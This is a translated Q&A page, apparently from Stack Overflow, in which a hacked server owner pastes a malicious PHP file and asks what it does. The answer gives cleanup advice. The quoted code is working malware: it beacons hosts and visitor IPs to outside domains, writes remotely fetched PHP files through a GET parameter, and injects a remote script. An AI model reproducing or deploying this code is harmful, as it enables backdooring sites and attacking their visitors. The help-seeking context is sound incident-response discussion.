文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >问答首页 >我的服务器被黑了。有人上传了一些脚本,我不知道这些脚本对我的服务器做了什么

我的服务器被黑了。有人上传了一些脚本,我不知道这些脚本对我的服务器做了什么
EN

Stack Overflow用户
提问于 2020-04-18 03:49:33
回答 1查看 198关注 0票数 0

有人将此脚本上传到我们的服务器上

https://github.com/mIcHyAmRaNe/wso-webshell

我们在服务器上的不同目录中发现了inc.php文件。inc文件中包含以下代码

代码语言:javascript
运行
复制
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', @$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);

if(function_exists('curl_init'))
{
$ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
    @$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
    @$gitt = file_get_contents($x);
}
echo $gitt;

if(isset($_GET['ksfg'])){
    $f=fopen($_GET['ksfg'].'.php','a');
    fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
    fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
    if(getenv("HTTP_CLIENT_IP")) {
        $ip = getenv("HTTP_CLIENT_IP");
    } elseif(getenv("HTTP_X_FORWARDED_FOR")) {
        $ip = getenv("HTTP_X_FORWARDED_FOR");
        if (strstr($ip, ',')) {
            $tmp = explode (',', $ip);
            $ip = trim($tmp[0]);
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
    }
    return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
    $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
    if($gitt == false){
        @$gitt = file_get_contents($x);
    }
}elseif(function_exists('file_get_contents')){
    @$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>

不知道这个脚本对我们的服务器做了什么。因为我们的服务器托管在上面,所以我们应该创建新的实例吗?或者我们是否应该从whm中暂停cpanel帐户并创建一个新帐户,然后将每个文件都复制到那里?请帮助我理解这段代码到底能做什么

php
server
EN

回答 1

Stack Overflow用户

发布于 2020-04-18 03:59:30

如果你被黑客攻击,首先尝试修改所有的密码,并重新检查自己添加的代码(最初的版本,直到第三方进入你的网站…也许让站点离线,直到检查...)。有可能有一个缺陷,这允许第三方上传任何想在你的网站!(这个问题必须解决)

关于添加的代码,基本上它列出了站点的内容和ip-s(以及一些重定向!对于普通用户来说非常危险)。但是无论第三党要做什么,都不知道!(当从外部获得管理员权限时,您可以说它现在是your_site所有者)。

票数 0
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/61279553

复制
相关文章

相似问题

领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档